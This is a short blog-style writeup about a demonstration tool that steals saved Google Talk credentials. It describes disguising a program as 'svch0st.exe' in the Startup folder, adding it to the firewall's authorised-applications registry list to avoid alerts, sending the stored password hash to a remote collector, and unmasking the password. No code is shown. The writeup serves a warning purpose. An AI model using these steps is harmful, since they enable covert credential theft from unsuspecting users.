Do you save Passwords ?
This is a WRITEUP about Google Talk Application and its Password Saving facility.
Tested on Google Talk 1.0.0.104 GTalk when set to save password, hashes and stores it like any other application for convenience but in a very secured manner.
I've developed a small application (Client-Server) which when executed by the target sends you its login name and hashed (/ encrypted) password string.When successfully dropped into and executed from C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ the application tricks Windows Firewall and doesn't ask with the unblock / cancel popup box.
The application running on the attacker's end will obtain the hash sent to it and will display the hash string on its side. The attacker can then replace/create his password hash with the target's hash.After this, when the attacker launches Google Talk we expect the (asterisked) password to be the same as the target's.
A password unhider tool can now aide the attacker to reveal (unmask) what the actual password of the target is.
[ Demonstration ]
Save svch0st.exe(attached) to C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Execute CollectGTPass.exe(attached)
- CollectGTPass.exe opens port 2803 on Localhost and will wait for signal from its Target/s (In our case the Target will connect to 127.0.0.1 since the Client and Server both are running on 127.0.0.1, locally) Note that the The target IP and Attacker Connection IP have been hardcoded in the exe since this is not a malware (trojan-tool) for everyone and is just for demonstration purpose.
- In the demonstration video(attached) XP Firewall prompted for the CollectGTPass.exe (GPWS2.exe) and the application has been unblocked in the XP Firewall now.
- When you will test this, Firewall won't popup any alert since the Target is connecting to loopback. In remote scenario, to avoid the alert svch0st.exe adds itself in List of AuthorisedApplications residing in HKLM before trying to connect remotely (Successfully Tested as shown in Video)
- Execute svch0st.exe
- svch0st.exe sends the encrypted password to Target:2803
- CollectGTPass.exe will now receive the encrypted Password and will wait for the next one.
- CollectGTPass waits forever to collect more password hashes from other sources.
- This tool has been successfully tested to obtain a target's hash remotely both in a local network as well as over public IPs.
- Screenshots and a Video of a successful local and remote respective retrieval attempt are attached.
[ Question ]
So does it work ? Do we get the Target's Password ?
[ Answer ]
NO !!
We get the hash and using a password unmasking tool we view the password.
But the hashing algorithm is still unknown to me.
[ Moral of the Story ]
Don't save passwords. Everything isn't GTalk.
[ What's Next ? ]
Skype.
Video..>http://senduit.com/96f520
.:credit:. .=.QuakerD00mer.=.
0 comments:
Post a Comment